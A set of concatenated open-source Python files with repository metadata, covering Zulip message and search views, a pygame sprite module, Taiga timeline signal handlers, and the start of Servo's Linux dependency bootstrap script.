reset_on_return=self._reset_on_return,
echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch)
sqlalchemy_engine = None
def get_sqlalchemy_connection():
global sqlalchemy_engine
if sqlalchemy_engine is None:
def get_dj_conn():
connection.ensure_connection()
return connection.connection
sqlalchemy_engine = sqlalchemy.create_engine('postgresql://',
creator=get_dj_conn,
poolclass=NonClosingPool,
pool_reset_on_return=False)
sa_connection = sqlalchemy_engine.connect()
sa_connection.execution_options(autocommit=False)
return sa_connection
@authenticated_json_post_view
def json_get_old_messages(request, user_profile):
return get_old_messages_backend(request, user_profile)
class BadNarrowOperator(Exception):
def __init__(self, desc):
self.desc = desc
def to_json_error_msg(self):
return 'Invalid narrow operator: ' + self.desc
# When you add a new operator to this, also update zerver/lib/narrow.py
class NarrowBuilder(object):
def __init__(self, user_profile, msg_id_column):
self.user_profile = user_profile
self.msg_id_column = msg_id_column
def add_term(self, query, term):
# We have to be careful here because we're letting users call a method
# by name! The prefix 'by_' prevents it from colliding with builtin
# Python __magic__ stuff.
operator = term['operator']
operand = term['operand']
negated = term.get('negated', False)
method_name = 'by_' + operator.replace('-', '_')
method = getattr(self, method_name, None)
if method is None:
raise BadNarrowOperator('unknown operator ' + operator)
if negated:
maybe_negate = not_
else:
maybe_negate = lambda cond: cond
return method(query, operand, maybe_negate)
def by_has(self, query, operand, maybe_negate):
if operand not in ['attachment', 'image', 'link']:
raise BadNarrowOperator("unknown 'has' operand " + operand)
col_name = 'has_' + operand
cond = column(col_name)
return query.where(maybe_negate(cond))
def by_in(self, query, operand, maybe_negate):
if operand == 'home':
conditions = exclude_muting_conditions(self.user_profile, [])
return query.where(and_(*conditions))
elif operand == 'all':
return query
raise BadNarrowOperator("unknown 'in' operand " + operand)
def by_is(self, query, operand, maybe_negate):
if operand == 'private':
query = query.select_from(join(query.froms[0], "zerver_recipient",
column("recipient_id") ==
literal_column("zerver_recipient.id")))
cond = or_(column("type") == Recipient.PERSONAL,
column("type") == Recipient.HUDDLE)
return query.where(maybe_negate(cond))
elif operand == 'starred':
cond = column("flags").op("&")(UserMessage.flags.starred.mask) != 0
return query.where(maybe_negate(cond))
elif operand == 'mentioned' or operand == 'alerted':
cond = column("flags").op("&")(UserMessage.flags.mentioned.mask) != 0
return query.where(maybe_negate(cond))
raise BadNarrowOperator("unknown 'is' operand " + operand)
_alphanum = frozenset(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
def _pg_re_escape(self, pattern):
"""
Escape user input to place in a regex
Python's re.escape escapes unicode characters in a way which postgres
fails on, u'\u03bb' to u'\\\u03bb'. This function will correctly escape
them for postgres, u'\u03bb' to u'\\u03bb'.
"""
s = list(pattern)
for i, c in enumerate(s):
if c not in self._alphanum:
if c == '\000':
s[1] = '\\000'
elif ord(c) >= 128:
# convert the character to hex postgres regex will take
# \uXXXX
s[i] = '\\u{:0>4x}'.format(ord(c))
else:
s[i] = '\\' + c
return ''.join(s)
def by_stream(self, query, operand, maybe_negate):
stream = get_stream(operand, self.user_profile.realm)
if stream is None:
raise BadNarrowOperator('unknown stream ' + operand)
if self.user_profile.realm.domain == "mit.edu":
# MIT users expect narrowing to "social" to also show messages to /^(un)*social(.d)*$/
# (unsocial, ununsocial, social.d, etc)
m = re.search(r'^(?:un)*(.+?)(?:\.d)*$', stream.name, re.IGNORECASE)
if m:
base_stream_name = m.group(1)
else:
base_stream_name = stream.name
matching_streams = get_active_streams(self.user_profile.realm).filter(
name__iregex=r'^(un)*%s(\.d)*$' % (self._pg_re_escape(base_stream_name),))
matching_stream_ids = [matching_stream.id for matching_stream in matching_streams]
recipients = bulk_get_recipients(Recipient.STREAM, matching_stream_ids).values()
cond = column("recipient_id").in_([recipient.id for recipient in recipients])
return query.where(maybe_negate(cond))
recipient = get_recipient(Recipient.STREAM, type_id=stream.id)
cond = column("recipient_id") == recipient.id
return query.where(maybe_negate(cond))
def by_topic(self, query, operand, maybe_negate):
if self.user_profile.realm.domain == "mit.edu":
# MIT users expect narrowing to topic "foo" to also show messages to /^foo(.d)*$/
# (foo, foo.d, foo.d.d, etc)
m = re.search(r'^(.*?)(?:\.d)*$', operand, re.IGNORECASE)
if m:
base_topic = m.group(1)
else:
base_topic = operand
# Additionally, MIT users expect the empty instance and
# instance "personal" to be the same.
if base_topic in ('', 'personal', '(instance "")'):
regex = r'^(|personal|\(instance ""\))(\.d)*$'
else:
regex = r'^%s(\.d)*$' % (self._pg_re_escape(base_topic),)
cond = column("subject").op("~*")(regex)
return query.where(maybe_negate(cond))
cond = func.upper(column("subject")) == func.upper(literal(operand))
return query.where(maybe_negate(cond))
def by_sender(self, query, operand, maybe_negate):
try:
sender = get_user_profile_by_email(operand)
except UserProfile.DoesNotExist:
raise BadNarrowOperator('unknown user ' + operand)
cond = column("sender_id") == literal(sender.id)
return query.where(maybe_negate(cond))
def by_near(self, query, operand, maybe_negate):
return query
def by_id(self, query, operand, maybe_negate):
cond = self.msg_id_column == literal(operand)
return query.where(maybe_negate(cond))
def by_pm_with(self, query, operand, maybe_negate):
if ',' in operand:
# Huddle
try:
emails = [e.strip() for e in operand.split(',')]
recipient = recipient_for_emails(emails, False,
self.user_profile, self.user_profile)
except ValidationError:
raise BadNarrowOperator('unknown recipient ' + operand)
cond = column("recipient_id") == recipient.id
return query.where(maybe_negate(cond))
else:
# Personal message
self_recipient = get_recipient(Recipient.PERSONAL, type_id=self.user_profile.id)
if operand == self.user_profile.email:
# Personals with self
cond = and_(column("sender_id") == self.user_profile.id,
column("recipient_id") == self_recipient.id)
return query.where(maybe_negate(cond))
# Personals with other user; include both directions.
try:
narrow_profile = get_user_profile_by_email(operand)
except UserProfile.DoesNotExist:
raise BadNarrowOperator('unknown user ' + operand)
narrow_recipient = get_recipient(Recipient.PERSONAL, narrow_profile.id)
cond = or_(and_(column("sender_id") == narrow_profile.id,
column("recipient_id") == self_recipient.id),
and_(column("sender_id") == self.user_profile.id,
column("recipient_id") == narrow_recipient.id))
return query.where(maybe_negate(cond))
def by_search(self, query, operand, maybe_negate):
tsquery = func.plainto_tsquery(literal("zulip.english_us_search"), literal(operand))
ts_locs_array = func.ts_match_locs_array
query = query.column(ts_locs_array(literal("zulip.english_us_search"),
column("rendered_content"),
tsquery).label("content_matches"))
# We HTML-escape the subject in Postgres to avoid doing a server round-trip
query = query.column(ts_locs_array(literal("zulip.english_us_search"),
func.escape_html(column("subject")),
tsquery).label("subject_matches"))
# Do quoted string matching. We really want phrase
# search here so we can ignore punctuation and do
# stemming, but there isn't a standard phrase search
# mechanism in Postgres
for term in re.findall('"[^"]+"|\S+', operand):
if term[0] == '"' and term[-1] == '"':
term = term[1:-1]
term = '%' + connection.ops.prep_for_like_query(term) + '%'
cond = or_(column("content").ilike(term),
column("subject").ilike(term))
query = query.where(maybe_negate(cond))
cond = column("search_tsvector").op("@@")(tsquery)
return query.where(maybe_negate(cond))
def highlight_string(string, locs):
if isinstance(string, unicode):
string = string.encode('utf-8')
highlight_start = '<span class="highlight">'
highlight_stop = '</span>'
pos = 0
result = ''
for loc in locs:
(offset, length) = loc
result += string[pos:offset]
result += highlight_start
result += string[offset:offset + length]
result += highlight_stop
pos = offset + length
result += string[pos:]
return result.decode('utf-8')
def get_search_fields(rendered_content, subject, content_matches, subject_matches):
return dict(match_content=highlight_string(rendered_content, content_matches),
match_subject=highlight_string(escape_html(subject), subject_matches))
def narrow_parameter(json):
# FIXME: A hack to support old mobile clients
if json == '{}':
return None
data = ujson.loads(json)
if not isinstance(data, list):
raise ValueError("argument is not a list")
def convert_term(elem):
# We have to support a legacy tuple format.
if isinstance(elem, list):
if (len(elem) != 2
or any(not isinstance(x, str) and not isinstance(x, unicode)
for x in elem)):
raise ValueError("element is not a string pair")
return dict(operator=elem[0], operand=elem[1])
if isinstance(elem, dict):
validator = check_dict([
('operator', check_string),
('operand', check_string),
])
error = validator('elem', elem)
if error:
raise JsonableError(error)
# whitelist the fields we care about for now
return dict(
operator=elem['operator'],
operand=elem['operand'],
negated=elem.get('negated', False),
)
raise ValueError("element is not a dictionary")
return map(convert_term, data)
def is_public_stream(stream, realm):
if not valid_stream_name(stream):
raise JsonableError("Invalid stream name")
stream = get_stream(stream, realm)
if stream is None:
return False
return stream.is_public()
def ok_to_include_history(narrow, realm):
# There are occasions where we need to find Message rows that
# have no corresponding UserMessage row, because the user is
# reading a public stream that might include messages that
# were sent while the user was not subscribed, but which they are
# allowed to see. We have to be very careful about constructing
# queries in those situations, so this function should return True
# only if we are 100% sure that we're gonna add a clause to the
# query that narrows to a particular public stream on the user's realm.
# If we screw this up, then we can get into a nasty situation of
# polluting our narrow results with messages from other realms.
include_history = False
if narrow is not None:
for term in narrow:
if term['operator'] == "stream" and not term.get('negated', False):
if is_public_stream(term['operand'], realm):
include_history = True
# Disable historical messages if the user is narrowing on anything
# that's a property on the UserMessage table. There cannot be
# historical messages in these cases anyway.
for term in narrow:
if term['operator'] == "is":
include_history = False
return include_history
def get_stream_name_from_narrow(narrow):
for term in narrow:
if term['operator'] == 'stream':
return term['operand'].lower()
return None
def exclude_muting_conditions(user_profile, narrow):
conditions = []
stream_name = get_stream_name_from_narrow(narrow)
if stream_name is None:
rows = Subscription.objects.filter(
user_profile=user_profile,
active=True,
in_home_view=False,
recipient__type=Recipient.STREAM
).values('recipient_id')
muted_recipient_ids = map(lambda row: row['recipient_id'], rows)
condition = not_(column("recipient_id").in_(muted_recipient_ids))
conditions.append(condition)
muted_topics = ujson.loads(user_profile.muted_topics)
if muted_topics:
if stream_name is not None:
muted_topics = [m for m in muted_topics if m[0].lower() == stream_name]
if not muted_topics:
return conditions
muted_streams = bulk_get_streams(user_profile.realm,
[muted[0] for muted in muted_topics])
muted_recipients = bulk_get_recipients(Recipient.STREAM,
[stream.id for stream in muted_streams.itervalues()])
recipient_map = dict((s.name.lower(), muted_recipients[s.id].id)
for s in muted_streams.itervalues())
muted_topics = [m for m in muted_topics if m[0].lower() in recipient_map]
if muted_topics:
def mute_cond(muted):
stream_cond = column("recipient_id") == recipient_map[muted[0].lower()]
topic_cond = func.upper(column("subject")) == func.upper(muted[1])
return and_(stream_cond, topic_cond)
condition = not_(or_(*map(mute_cond, muted_topics)))
return conditions + [condition]
return conditions
@has_request_variables
def get_old_messages_backend(request, user_profile,
anchor = REQ(converter=int),
num_before = REQ(converter=to_non_negative_int),
num_after = REQ(converter=to_non_negative_int),
narrow = REQ('narrow', converter=narrow_parameter, default=None),
use_first_unread_anchor = REQ(default=False, converter=ujson.loads),
apply_markdown=REQ(default=True,
converter=ujson.loads)):
include_history = ok_to_include_history(narrow, user_profile.realm)
if include_history and not use_first_unread_anchor:
query = select([column("id").label("message_id")], None, "zerver_message")
inner_msg_id_col = literal_column("zerver_message.id")
elif narrow is None:
query = select([column("message_id"), column("flags")],
column("user_profile_id") == literal(user_profile.id),
"zerver_usermessage")
inner_msg_id_col = column("message_id")
else:
# TODO: Don't do this join if we're not doing a search
query = select([column("message_id"), column("flags")],
column("user_profile_id") == literal(user_profile.id),
join("zerver_usermessage", "zerver_message",
literal_column("zerver_usermessage.message_id") ==
literal_column("zerver_message.id")))
inner_msg_id_col = column("message_id")
num_extra_messages = 1
is_search = False
if narrow is not None:
# Add some metadata to our logging data for narrows
verbose_operators = []
for term in narrow:
if term['operator'] == "is":
verbose_operators.append("is:" + term['operand'])
else:
verbose_operators.append(term['operator'])
request._log_data['extra'] = "[%s]" % (",".join(verbose_operators),)
# Build the query for the narrow
num_extra_messages = 0
builder = NarrowBuilder(user_profile, inner_msg_id_col)
for term in narrow:
if term['operator'] == 'search' and not is_search:
query = query.column("subject").column("rendered_content")
is_search = True
query = builder.add_term(query, term)
# We add 1 to the number of messages requested if no narrow was
# specified to ensure that the resulting list always contains the
# anchor message. If a narrow was specified, the anchor message
# might not match the narrow anyway.
if num_after != 0:
num_after += num_extra_messages
else:
num_before += num_extra_messages
sa_conn = get_sqlalchemy_connection()
if use_first_unread_anchor:
condition = column("flags").op("&")(UserMessage.flags.read.mask) == 0
# We exclude messages on muted topics when finding the first unread
# message in this narrow
muting_conditions = exclude_muting_conditions(user_profile, narrow)
if muting_conditions:
condition = and_(condition, *muting_conditions)
first_unread_query = query.where(condition)
first_unread_query = first_unread_query.order_by(inner_msg_id_col.asc()).limit(1)
first_unread_result = list(sa_conn.execute(first_unread_query).fetchall())
if len(first_unread_result) > 0:
anchor = first_unread_result[0][0]
else:
anchor = 10000000000000000
before_query = None
after_query = None
if num_before != 0:
before_anchor = anchor
if num_after != 0:
# Don't include the anchor in both the before query and the after query
before_anchor = anchor - 1
before_query = query.where(inner_msg_id_col <= before_anchor) \
.order_by(inner_msg_id_col.desc()).limit(num_before)
if num_after != 0:
after_query = query.where(inner_msg_id_col >= anchor) \
.order_by(inner_msg_id_col.asc()).limit(num_after)
if num_before == 0 and num_after == 0:
# This can happen when a narrow is specified.
after_query = query.where(inner_msg_id_col == anchor)
if before_query is not None:
if after_query is not None:
query = union_all(before_query.self_group(), after_query.self_group())
else:
query = before_query
else:
query = after_query
main_query = alias(query)
query = select(main_query.c, None, main_query).order_by(column("message_id").asc())
# This is a hack to tag the query we use for testing
query = query.prefix_with("/* get_old_messages */")
query_result = list(sa_conn.execute(query).fetchall())
# The following is a little messy, but ensures that the code paths
# are similar regardless of the value of include_history. The
# 'user_messages' dictionary maps each message to the user's
# UserMessage object for that message, which we will attach to the
# rendered message dict before returning it. We attempt to
# bulk-fetch rendered message dicts from memcached using the
# 'messages' list.
search_fields = dict()
message_ids = []
user_message_flags = {}
if include_history:
message_ids = [row[0] for row in query_result]
# TODO: This could be done with an outer join instead of two queries
user_message_flags = dict((user_message.message_id, user_message.flags_list()) for user_message in
UserMessage.objects.filter(user_profile=user_profile,
message__id__in=message_ids))
for row in query_result:
message_id = row[0]
if user_message_flags.get(message_id) is None:
user_message_flags[message_id] = ["read", "historical"]
if is_search:
(_, subject, rendered_content, content_matches, subject_matches) = row
search_fields[message_id] = get_search_fields(rendered_content, subject,
content_matches, subject_matches)
else:
for row in query_result:
message_id = row[0]
flags = row[1]
user_message_flags[message_id] = parse_usermessage_flags(flags)
message_ids.append(message_id)
if is_search:
(_, _, subject, rendered_content, content_matches, subject_matches) = row
search_fields[message_id] = get_search_fields(rendered_content, subject,
content_matches, subject_matches)
cache_transformer = lambda row: Message.build_dict_from_raw_db_row(row, apply_markdown)
id_fetcher = lambda row: row['id']
message_dicts = generic_bulk_cached_fetch(lambda message_id: to_dict_cache_key_id(message_id, apply_markdown),
Message.get_raw_db_rows,
message_ids,
id_fetcher=id_fetcher,
cache_transformer=cache_transformer,
extractor=extract_message_dict,
setter=stringify_message_dict)
message_list = []
for message_id in message_ids:
msg_dict = message_dicts[message_id]
msg_dict.update({"flags": user_message_flags[message_id]})
msg_dict.update(search_fields.get(message_id, {}))
message_list.append(msg_dict)
statsd.incr('loaded_old_messages', len(message_list))
ret = {'messages': message_list,
"result": "success",
"msg": ""}
return json_success(ret)
@authenticated_json_post_view
def json_update_flags(request, user_profile):
return update_message_flags(request, user_profile);
@has_request_variables
def update_message_flags(request, user_profile,
messages=REQ('messages', validator=check_list(check_int)),
operation=REQ('op'), flag=REQ('flag'),
all=REQ('all', validator=check_bool, default=False)):
request._log_data["extra"] = "[%s %s]" % (operation, flag)
do_update_message_flags(user_profile, operation, flag, messages, all)
return json_success({'result': 'success',
'messages': messages,
'msg': ''})
def create_mirrored_message_users(request, user_profile, recipients):
if "sender" not in request.POST:
return (False, None)
sender_email = request.POST["sender"].strip().lower()
referenced_users = set([sender_email])
if request.POST['type'] == 'private':
for email in recipients:
referenced_users.add(email.lower())
if request.client.name == "zephyr_mirror":
user_check = same_realm_zephyr_user
fullname_function = compute_mit_user_fullname
elif request.client.name == "irc_mirror":
user_check = same_realm_irc_user
fullname_function = compute_irc_user_fullname
elif request.client.name in ("jabber_mirror", "JabberMirror"):
user_check = same_realm_jabber_user
fullname_function = compute_jabber_user_fullname
else:
# Unrecognized mirroring client
return (False, None)
for email in referenced_users:
# Check that all referenced users are in our realm:
if not user_check(user_profile, email):
return (False, None)
# Create users for the referenced users, if needed.
for email in referenced_users:
create_mirror_user_if_needed(user_profile.realm, email, fullname_function)
sender = get_user_profile_by_email(sender_email)
return (True, sender)
def same_realm_zephyr_user(user_profile, email):
# Are the sender and recipient both @mit.edu addresses?
# We have to handle this specially, inferring the domain from the
# e-mail address, because the recipient may not existing in Zulip
# and we may need to make a stub MIT user on the fly.
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
return user_profile.realm.domain == "mit.edu" and domain == "mit.edu"
def same_realm_irc_user(user_profile, email):
# Check whether the target email address is an IRC user in the
# same realm as user_profile, i.e. if the domain were example.com,
# the IRC user would need to be username@irc.example.com
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
return user_profile.realm.domain == domain.replace("irc.", "")
def same_realm_jabber_user(user_profile, email):
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
# The ist.mit.edu realm uses mit.edu email addresses so that their accounts
# can receive mail.
if user_profile.realm.domain == 'ist.mit.edu' and domain == 'mit.edu':
return True
return user_profile.realm.domain == domain
@authenticated_api_view
def api_send_message(request, user_profile):
return send_message_backend(request, user_profile)
@authenticated_json_post_view
def json_send_message(request, user_profile):
return send_message_backend(request, user_profile)
# We do not @require_login for send_message_backend, since it is used
# both from the API and the web service. Code calling
# send_message_backend should either check the API key or check that
# the user is logged in.
@has_request_variables
def send_message_backend(request, user_profile,
message_type_name = REQ('type'),
message_to = REQ('to', converter=extract_recipients, default=[]),
forged = REQ(default=False),
subject_name = REQ('subject', lambda x: x.strip(), None),
message_content = REQ('content'),
domain = REQ('domain', default=None),
local_id = REQ(default=None),
queue_id = REQ(default=None)):
client = request.client
is_super_user = request.user.is_api_super_user()
if forged and not is_super_user:
return json_error("User not authorized for this query")
realm = None
if domain and domain != user_profile.realm.domain:
if not is_super_user:
# The email gateway bot needs to be able to send messages in
# any realm.
return json_error("User not authorized for this query")
realm = get_realm(domain)
if not realm:
return json_error("Unknown domain " + domain)
if client.name in ["zephyr_mirror", "irc_mirror", "jabber_mirror", "JabberMirror"]:
# Here's how security works for mirroring:
#
# For private messages, the message must be (1) both sent and
# received exclusively by users in your realm, and (2)
# received by the forwarding user.
#
# For stream messages, the message must be (1) being forwarded
# by an API superuser for your realm and (2) being sent to a
# mirrored stream (any stream for the Zephyr and Jabber
# mirrors, but only streams with names starting with a "#" for
# IRC mirrors)
#
# The security checks are split between the below code
# (especially create_mirrored_message_users which checks the
# same-realm constraint) and recipient_for_emails (which
# checks that PMs are received by the forwarding user)
if "sender" not in request.POST:
return json_error("Missing sender")
if message_type_name != "private" and not is_super_user:
return json_error("User not authorized for this query")
(valid_input, mirror_sender) = \
create_mirrored_message_users(request, user_profile, message_to)
if not valid_input:
return json_error("Invalid mirrored message")
if client.name == "zephyr_mirror" and user_profile.realm.domain != "mit.edu":
return json_error("Invalid mirrored realm")
if (client.name == "irc_mirror" and message_type_name != "private" and
not message_to[0].startswith("#")):
return json_error("IRC stream names must start with #")
sender = mirror_sender
else:
sender = user_profile
ret = check_send_message(sender, client, message_type_name, message_to,
subject_name, message_content, forged=forged,
forged_timestamp = request.POST.get('time'),
forwarder_user_profile=user_profile, realm=realm,
local_id=local_id, sender_queue_id=queue_id)
return json_success({"id": ret})
@authenticated_json_post_view
def json_update_message(request, user_profile):
return update_message_backend(request, user_profile)
@has_request_variables
def update_message_backend(request, user_profile,
message_id=REQ(converter=to_non_negative_int),
subject=REQ(default=None),
propagate_mode=REQ(default="change_one"),
content=REQ(default=None)):
if subject is None and content is None:
return json_error("Nothing to change")
do_update_message(user_profile, message_id, subject, propagate_mode, content)
return json_success()
@authenticated_json_post_view
@has_request_variables
def json_fetch_raw_message(request, user_profile,
message_id=REQ(converter=to_non_negative_int)):
try:
message = Message.objects.get(id=message_id)
except Message.DoesNotExist:
return json_error("No such message")
if message.sender != user_profile:
return json_error("Message was not sent by you")
return json_success({"raw_content": message.content})
@has_request_variables
def render_message_backend(request, user_profile, content=REQ):
rendered_content = bugdown.convert(content, user_profile.realm.domain)
return json_success({"rendered": rendered_content})
@authenticated_json_post_view
def json_messages_in_narrow(request, user_profile):
return messages_in_narrow_backend(request, user_profile)
@has_request_variables
def messages_in_narrow_backend(request, user_profile,
msg_ids = REQ(validator=check_list(check_int)),
narrow = REQ(converter=narrow_parameter)):
# Note that this function will only work on messages the user
# actually received
# TODO: We assume that the narrow is a search. For now this works because
# the browser only ever calls this function for searches, since it can't
# apply that narrow operator itself.
query = select([column("message_id"), column("subject"), column("rendered_content")],
and_(column("user_profile_id") == literal(user_profile.id),
column("message_id").in_(msg_ids)),
join("zerver_usermessage", "zerver_message",
literal_column("zerver_usermessage.message_id") ==
literal_column("zerver_message.id")))
builder = NarrowBuilder(user_profile, column("message_id"))
for term in narrow:
query = builder.add_term(query, term)
sa_conn = get_sqlalchemy_connection()
query_result = list(sa_conn.execute(query).fetchall())
search_fields = dict()
for row in query_result:
(message_id, subject, rendered_content, content_matches, subject_matches) = row
search_fields[message_id] = get_search_fields(rendered_content, subject,
content_matches, subject_matches)
return json_success({"messages": search_fields})
|
JanzTam/zulip
|
zerver/views/messages.py
|
Python
|
apache-2.0
| 36,656
| 0.003492
|
import pygame
from pygame.colordict import THECOLORS
import data
class Platform(pygame.sprite.Sprite):
def __init__(self, width, height):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface([width, height])
self.image.fill(THECOLORS["green"])
self.rect = self.image.get_rect()
class Trampoline(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = data.load_image("trampoline.png")
self.rect = self.image.get_rect()
|
Sveder/pyweek24
|
gamelib/platforms.py
|
Python
|
apache-2.0
| 537
| 0
|
# Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _
from taiga.projects.history import services as history_services
from taiga.projects.models import Project
from taiga.users.models import User
from taiga.projects.history.choices import HistoryType
from taiga.timeline.service import (push_to_timeline,
build_user_namespace,
build_project_namespace,
extract_user_info)
# TODO: Add events to followers timeline when followers are implemented.
# TODO: Add events to project watchers timeline when project watchers are implemented.
def _push_to_timeline(*args, **kwargs):
if settings.CELERY_ENABLED:
push_to_timeline.delay(*args, **kwargs)
else:
push_to_timeline(*args, **kwargs)
def _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data={}):
if project is not None:
# Actions related with a project
## Project timeline
_push_to_timeline(project, obj, event_type, created_datetime,
namespace=build_project_namespace(project),
extra_data=extra_data)
## User profile timelines
## - Me
related_people = User.objects.filter(id=user.id)
## - Owner
if hasattr(obj, "owner_id") and obj.owner_id:
related_people |= User.objects.filter(id=obj.owner_id)
## - Assigned to
if hasattr(obj, "assigned_to_id") and obj.assigned_to_id:
related_people |= User.objects.filter(id=obj.assigned_to_id)
## - Watchers
watchers = getattr(obj, "watchers", None)
if watchers:
related_people |= obj.watchers.all()
## - Exclude inactive and system users and remove duplicate
related_people = related_people.exclude(is_active=False)
related_people = related_people.exclude(is_system=True)
related_people = related_people.distinct()
_push_to_timeline(related_people, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
else:
# Actions not related with a project
## - Me
_push_to_timeline(user, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
def _clean_description_fields(values_diff):
# Description_diff and description_html if included can be huge, we are
# removing the html one and clearing the diff
values_diff.pop("description_html", None)
if "description_diff" in values_diff:
values_diff["description_diff"] = _("Check the history API for the exact diff")
def on_new_history_entry(sender, instance, created, **kwargs):
if instance._importing:
return
if instance.is_hidden:
return None
model = history_services.get_model_from_key(instance.key)
pk = history_services.get_pk_from_key(instance.key)
obj = model.objects.get(pk=pk)
project = obj.project
if instance.type == HistoryType.create:
event_type = "create"
elif instance.type == HistoryType.change:
event_type = "change"
elif instance.type == HistoryType.delete:
event_type = "delete"
user = User.objects.get(id=instance.user["pk"])
values_diff = instance.values_diff
_clean_description_fields(values_diff)
extra_data = {
"values_diff": values_diff,
"user": extract_user_info(user),
"comment": instance.comment,
"comment_html": instance.comment_html,
}
# Detect deleted comment
if instance.delete_comment_date:
extra_data["comment_deleted"] = True
created_datetime = instance.created_at
_push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=extra_data)
def create_membership_push_to_timeline(sender, instance, **kwargs):
"""
Creating new membership with associated user. If the user is the project owner we don't
do anything because that info will be shown in created project timeline entry
@param sender: Membership model
@param instance: Membership object
"""
# We shown in created project timeline entry
if not instance.pk and instance.user and instance.user != instance.project.owner:
created_datetime = instance.created_at
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# Updating existing membership
elif instance.pk:
try:
prev_instance = sender.objects.get(pk=instance.pk)
if instance.user != prev_instance.user:
created_datetime = timezone.now()
# The new member
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# If we are updating the old user is removed from project
if prev_instance.user:
_push_to_timelines(instance.project,
prev_instance.user,
prev_instance,
"delete",
created_datetime)
except sender.DoesNotExist:
# This happens with some tests, when a membership is created with a concrete id
pass
def delete_membership_push_to_timeline(sender, instance, **kwargs):
if instance.user:
created_datetime = timezone.now()
_push_to_timelines(instance.project, instance.user, instance, "delete", created_datetime)
def create_user_push_to_timeline(sender, instance, created, **kwargs):
if created:
project = None
user = instance
_push_to_timelines(project, user, user, "create", created_datetime=user.date_joined)
|
obimod/taiga-back
|
taiga/timeline/signals.py
|
Python
|
agpl-3.0
| 6,716
| 0.003873
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function
from distutils.spawn import find_executable
from distutils.version import LooseVersion
import json
import os
import platform
import shutil
import subprocess
from subprocess import PIPE
import servo.packages as packages
from servo.util import extract, download_file, host_triple
def install_trusty_deps(force):
version = str(subprocess.check_output(['gcc', '-dumpversion'])).split('.')
gcc = True
if int(version[0]) > 4:
gcc = False
elif int(version[0]) == 4 and int(version[1]) >= 9:
gcc = False
version = str(subprocess.check_output(['clang', '-dumpversion'])).split('.')
clang = int(version[0]) < 4
if gcc:
run_as_root(["add-apt-repository", "ppa:ubuntu-toolchain-r/test"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "gcc-4.9", "g++-4.9"], force)
run_as_root(['update-alternatives', '--install', '/usr/bin/gcc', 'gcc',
'/usr/bin/gcc-4.9', '60', '--slave', '/usr/bin/g++', 'g++',
'/usr/bin/g++-4.9'])
if clang:
run_as_root(["bash", "-c", 'wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | sudo apt-key add -'])
run_as_root(["apt-add-repository", "deb http://apt.llvm.org/trusty/ llvm-toolchain-xenial-4.0 main"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "clang-4.0"], force)
return gcc or clang
def check_gstreamer_lib():
return subprocess.call(["pkg-config", "gstreamer-1.0 >= 1.12"],
stdout=PIPE, stderr=PIPE) == 0
def run_as_root(command, force=False):
if os.geteuid() != 0:
command.insert(0, 'sudo')
if force:
command += "-y"
return subprocess.call(command)
def install_linux_deps(context, pkgs_ubuntu, pkgs_fedora, force):
install = False
pkgs = []
if context.distro == 'Ubuntu':
command = ['apt-get', 'install']
pkgs = pkgs_ubuntu
if subprocess.call(['dpkg', '-s'] + pkgs, stdout=PIPE, stderr=PIPE) != 0:
install = True
elif context.distro in ['CentOS', 'CentOS Linux', 'Fedora']:
installed_pkgs = str(subprocess.check_output(['rpm', '-qa'])).replace('\n', '|')
pkgs = pkgs_fedora
for p in pkgs:
command = ['dnf', 'install']
if "|{}".format(p) not in installed_pkgs:
install = True
break
if install:
if force:
command.append('-y')
print("Installing missing dependencies...")
run_as_root(command + pkgs)
return True
return False
def install_salt_dependencies(context, force):
pkgs_apt = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']
pkgs_dnf = ['gcc', 'libffi-devel', 'python-devel', 'openssl-devel']
if not install_linux_deps(context, pkgs_apt, pkgs_dnf, force):
print("Dependencies are already installed")
def gstreamer(context, force=False):
cur = os.curdir
gstdir = os.path.join(cur, "support", "linux", "gstreamer")
if not os.path.isdir(os.path.join(gstdir, "gstreamer", "lib")):
subprocess.check_call(["bash", "gstreamer.sh"], cwd=gstdir)
return True
return False
def bootstrap_gstreamer(context, force=False):
if not gstreamer(context, force):
print("gstreamer is already set up")
return 0
def linux(context, force=False):
# Please keep these in sync with the packages in README.md
pkgs_apt = ['git', 'curl', 'autoconf', 'libx11-dev', 'libfreetype6-dev',
'libgl1-mesa-dri', 'libglib2.0-dev', 'xorg-dev', 'gperf', 'g++',
'build-essential', 'cmake', 'python-pip',
'libbz2-dev', 'libosmesa6-dev', 'libxmu6', 'libxmu-dev', 'libglu1-mesa-dev',
'libgles2-mesa-dev', 'libegl1-mesa-dev', 'libdbus-1-dev', 'libharfbuzz-dev',
